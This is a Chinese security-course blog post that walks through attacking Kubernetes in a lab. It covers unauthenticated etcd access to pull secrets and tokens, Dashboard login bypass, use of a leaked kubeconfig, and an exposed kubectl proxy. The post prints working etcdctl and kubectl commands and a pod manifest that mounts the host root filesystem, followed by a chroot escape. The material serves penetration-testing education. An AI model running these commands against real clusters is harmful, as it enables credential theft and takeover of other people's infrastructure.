【第98课】云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露

已于 2024-09-03 11:33:19 修改
阅读量846 收藏 11
点赞数 15
文章标签: 云原生 kubernetes 安全
于 2024-09-03 10:24:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucker_YYY/article/details/141854645
版权

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

知识点

1、云原生-K8s安全-etcd未授权访问
2、云原生-K8s安全-Dashboard未授权访问
3、云原生-K8s安全-Configfile鉴权文件泄漏
4、云原生-K8s安全-Kubectl Proxy不安全配置

章节点:
云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器,VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

搭建环境使用3台Centos 7(可参考录像或者看下面两个文章搭建)
centos7安装kubernetes k8s v1.16.0 国内环境 - 简书
https://blog.csdn.net/fly910905/article/details/120887686

一个集群包含三个节点,其中包括一个控制节点和两个工作节点和一个数据库节点

K8s-master 192.168.139.130
K8s-node1 192.168.139.131
K8s-node2 192.168.139.132
k8s-etcd 192.168.139.136

在这里插入图片描述

一、演示案例-云原生-K8s安全-etcd(Master-数据库)未授权访问

实战中不会常见,利用条件比较苛刻。
默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。

攻击23791端口

在这里插入图片描述

配置文件:

/etc/kubernetes/manifests/etcd.yaml

在这里插入图片描述

第一种(满足)
在安装etcd时,没有配置指定--client-cert-auth 参数打开证书校验,暴露在外Etcd服务存在未授权访问风险。
-暴露外部可以访问,直接未授权访问获取secrets和token利用

在这里插入图片描述
重启kubelet进程

systemctl restart kubelet

在这里插入图片描述

第二种
在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。
-只能本地访问,直接未授权访问获取secrets和token利用
第三种(满足)
实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1),如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
-只能本地访问,利用ssrf或其他进行获取secrets和token利用

复现搭建

https://www.cnblogs.com/qtzd/p/k8s_etcd.html

复现利用:

etcdV2/V3版本利用参考:
https://www.cnblogs.com/qtzd/p/k8s_etcd.html
https://www.wangan.com/p/7fy7f81f02d9563a

暴露etcd未授权->获取secrets&token->通过token访问API-Server接管

etcdV2版本利用

直接访问http://ip:2379/v2/keys/?recursive=true ,
可以看到所有的key-value值。(secrets token)
在这里插入图片描述

etcdV3版本利用

安装etcdctl

Releases · etcd-io/etcd · GitHub

安装kubectl

在 Linux 系统中安装并设置 kubectl | Kubernetes

1、连接提交测试
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix

在这里插入图片描述

./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey1 "Hello world1"

在这里插入图片描述

./etcdctl --
endpoints=192.168.139.136:23791 put /testdir/testkey2 "Hello world2"
./etcdctl --
endpoints=192.168.139.136:23791 put /testdir/testkey3 "Hello world3"
2、获取k8s的secrets
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/
3、读取service account token
./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole

./etcdctl --endpoints=192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z
4、通过token访问API-Server,获取集群的权限
kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="ey..." -n kube-system get pods

SSRF解决限制访问->获取secrets&token->通过token访问API-Server接管

二、演示案例-云原生-K8s安全-Dashboard(Master-web面板)未授权访问

默认端口:8001(一般会被映射成别的端口)

配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。
kubernetes dashboard的未授权其实分两种情况:
一种是在本身就存在着不需要登录的http接口,但接口本身并不会暴露出来,如接口被暴露在外,就会导致dashboard未授权。
另外一种情况则是开发嫌登录麻烦,修改了配置文件,使得安全接口https的dashboard页面可以跳过登录。

复现利用

前提条件
用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboard
Kubernetes-dashboard绑定cluster-admin(拥有管理集群的最高权限)
1、安装

kubernetes -- 搭建 DashBoard_创建kubernetes-dashboard.yaml-CSDN博客

2、启动
kubectl create -f recommended.yaml

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、卸载
kubectl delete -f recommended.yaml
4、查看状态
kubectl get pod,svc -n kubernetes-dashboard
5、利用:新增Pod后续同前面利用一致
apiVersion: v1
kind: Pod
metadata:
  name: xiaodisec
spec:
  containers:
  - image: nginx
    name: xiaodisec
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

找到暴露面板->dashboard跳过-创建或上传pod->进入pod执行-利用挂载逃逸

三、演示案例-云原生-K8s安全-Configfile鉴权文件泄漏

攻击者通过Webshell、Github等拿到了K8s配置的Config文件,操作集群,从而接管所有容器。
K8s configfile作为K8s集群的管理凭证,其中包含有关K8s集群的详细信息(API Server、登录凭证)。
如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等),就可以直接通过API Server接管K8s集群,带来风险隐患。用户凭证保存
在kubeconfig文件中,通过以下顺序来找到kubeconfig文件:
-如果提供了--kubeconfig参数,就使用提供的kubeconfig文件
-如果没有提供--kubeconfig参数,但设置了环境变量$KUBECONFIG,则使用该环境变量提供的kubeconfig文件

-如果以上两种情况都没有,kubectl就使用默认的kubeconfig文件~/.kube/config

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

复现利用

K8s-configfile->创建Pod/挂载主机路径->Kubectl进入容器->利用挂载逃逸
1、将获取到的config复制
2、安装kubectl使用config连接

安装kubectl:
在 Linux 系统中安装并设置 kubectl | Kubernetes
连接:

kubectl -s https://192.168.139.130:6443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、上传利用test.yaml创建pod
kubectl apply -f test.yaml -n default --kubeconfig=config

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、连接pod后进行容器挂载逃逸
kubectl exec -it xiaodisec bash -n default --kubeconfig=config

在这里插入图片描述

cd /mnt
chroot . bash

在这里插入图片描述

四、演示案例-云原生-K8s安全-Kubectl Proxy不安全配置

当运维人员需要某个环境暴露端口或者IP时,会用到Kubectl Proxy
使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上

在这里插入图片描述

环境搭建

kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009

在这里插入图片描述
在这里插入图片描述

复现利用

类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。
找到暴露入口点,根据类型选择合适方案

kubectl -s http://192.168.139.130:8009 get pods -n kube-system

在这里插入图片描述

Lucker_YYY
关注
  • 15
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队攻防渗透技术实战流程:云安全云原生安全K8s安全etcd Dashboard Configfile漏洞
HACKONE的博客
05-22 232
第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。etcd是master节点的数据库,通过未授权获取token和证书来攻击,etcd的端口是2379:默认通过证书认证,主要存放节点的数据,如一些token和证书。第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
云原生K8s实战》金山云K8s集群
君逍遥o
05-18 149
K8S集群是基于原生的Kubernetes进行安装和适配,并整合了虚拟化、网络、存储等能力,包括本地仓库Harbor、集群用户界面的Dashboard、关系型数据库MySQL、列式数据库HBase、分布式的实时文件存储、搜错引擎Elasticsearch等。为客户提供高可靠、高性能、高度可扩展的容器管理服务。
云上攻防-云原生&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
siu~
03-06 1388
1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy安全配置
Day98:云上攻防-云原生&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
m0_74402888的博客
08-24 2146
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接未授权访问获取secrets和token利用。
Kubernetes&K8s安全及渗透
qq_45087791的博客
03-26 1267
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。1、Master节点2、Node节点3、Pod。
golang云原生Kubernetes基础
SMILY12138的博客
04-18 689
云计算是现代软件架构的重要组成部分,Kubernetes 是一种开源平台,用于管理云计算中的自动化容器化应用程序。Go 是一种简单、高效、并发和可扩展的编程语言,它是创建云原生应用程序的理想选择之一。它还管理节点上的网络和存储资源。- kube-controller-manager:kube-controller-manager 用于管理 Kubernetes 集群中的各种控制器。由于 Kubernetes 本身是用 Go 编写的,因此使用 Golang 进行云原生应用程序的开发是非常容易的。
K8S架构师全套教程
weixin_47678667的博客
07-10 1960
k8s架构师一文全解
k8sKubernetes)最新100道面试题及参考答案(5万字长文)
大模型大数据攻城狮的专栏
04-17 499
Pod是Kubernetes中最小的部署单元,它是一组一个或多个紧密相关的容器的集合,这些容器共享网络和存储资源。Pod中的容器运行在同一个网络命名空间中,因此它们可以通过localhost进行通信,并能够访问相同的IP地址和端口范围。此外,Pod内的容器还共享存储卷,这意味着它们可以访问相同的文件系统。Pod的设计使得它非常适合于微服务架构和云原生应用,因为它允许开发者将紧密相关的服务打包在一起,并作为一个整体进行部署、扩展和管理。
云原生安全攻防》-- K8s攻击案例:高权限Service Account接管集群
persist213的博客
09-03 320
假设攻击者成功入侵了一个容器内的web应用,并获得了这个Pod的shell权限,这个时候,如果Pod关联的Service Account拥有创建Pod的权限,攻击者就可以利用污点容忍的方式,将一个恶意Pod调度到Master节点上,通过在恶意Pod中挂载根目录,攻击者就可以获取到Master节点上的 kubeconfig 文件,从而直接接管整个K8s集群。攻击者可能会尝试获取有效的Service account凭证,并利用这些凭据来访问集群中的敏感资源,执行特权操作,甚至在集群中创建、修改或删除资源。
《Cloud Native Data Center Networking》(云原生数据中心网络设计)读书笔记 -- 09部署OSPF
最新发布
梆子井欢喜坨的博客
09-03 788
例如,在图 13-2 中,区域之间的流量必须经过 R3 和 R4。
小阿轩yx-云原生存储Rook部署Ceph
2401_83435725的博客
09-03 267
小阿轩yx-云原生存储Rook部署Ceph
Kubernetes部署】二进制搭建K8s高可用集群1.26.15版本(超详细,可跟做)
秦子腾
08-30 1693
kube-scheduler,负责将 Pods 调度到合适的节点上,根据预定义的策略和资源的可用性,选择最适合的节点以运行 Pod,kube-scheduler 会考虑各种因素,如节点资源、Pod 需求、亲和性和反亲和性规则等,确保 Pod 在集群中均匀地分布并满足性能需求。提示:在master-1、master-2、master-3中部署组件,证书和配置的可以先在其中一台生成,然后拷贝到其他master主机中。1、创建etcd目录(master-1、master-2、master-3中都要先创建)
k8s-pod 实战三 (Liveness Probe 和 Readiness Probe 详细分析)
jundao1997的专栏
08-30 311
Liveness Probe 用于检查容器是否处于健康状态。如果探针失败,Kubernetes 会杀死容器并根据重启策略决定是否重启。这对于检测和恢复应用程序中的死锁或其他致命错误非常有用。
银河麒麟v10-sp3-x86系统安装k8s-1.30.4
qq_59634082的博客
08-30 1397
以一个类比的方式来说,就好像开车上高速,如果路况通畅,车速可以很快,但是如果遇到堵车,需要走应急车道,就会耽误时间。:x86-64架构的处理器通常提供高性能的计算能力,支持大量的内存和复杂的操作系统,如Windows、Linux和macOS。交换分区的使用可以有效避免程序因为内存不足而崩溃或运行缓慢的问题,但是硬盘的读写速度比内存要慢得多,因此交换分区的使用会对系统的性能产生一定的影响。4、配合银河麒麟服务器的评估和迁移能力,降低用户业务系统适配国产架构平台难度,实现业务系统中服务器操作系统的无感迁移。
K8S日志收集
henanchenxuyuan的博客
09-03 836
基于云原生 12 要素开发的程序,一般会将日志直接输出到控制台,并非是指定一个文件存储日志,这一点和传统架构还是有区别的。但是公司内的程序并非都是基于云原生要素开发的,比如一些年代已久的程序,这类程序如果部署至 Kubernetes 集群中,就需要考虑如何将输出至本地文件的日志采集到Elasticsearch。
kubeadm方式升级k8s集群
srebro | 博客
09-03 286
升级前最好备份所有组件及数据,例如etcd跨多个版本的可以逐个版本进行升级。目前我的版本是v1.20.4,官网最新版本已经到1.25.0。升级到最新版本需要逐步升级:v1.20.4–>v1.21.4–>v1.22.4–>v1.23.4–>v1.24.4–>v1.25.0,共升级5次。先配置阿里云yum源,每台节点都需要配置查询版本,会列出目前所有的正式版本,我们现在从1.20.4升级到1.21版本,所以需要找到v.1.21.4版本号。
k8s dial tcp 10.97.0.1:443: i/o timeout
weixin_40548182的博客
08-29 349
使用 kubeadm 部署完 k8s ,使用 projectcalico/tigera-operator 这个 chart 部署 calico ,卡在了 tigera-operator 这个 namespace 下的 pod tigera-operator-54b47459dd-n4x72,该 pod 一直重启,查看该 pod 日志发现如下报错。查看 endpoints,发现 kubernetes 的 ENDPOINTS 地址不对,这个地址是 node 上另外一个段的,这个段不是所有的主机都能通。
K8s系列之:Operator 和 Operator Framework
zhengzaifeidelushang的博客
09-02 909
Operator 是 CRD 配合 可选的 webhook 和 controller,在 Kubernetes 体系下扩展用户业务逻辑的一套机制;kubebuilder 是社区认可度很高的一种官方、标准化 Operator 框架;按照上文实战步骤,填充用户自定义代码,就可以很方便的实现一个 Operator。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值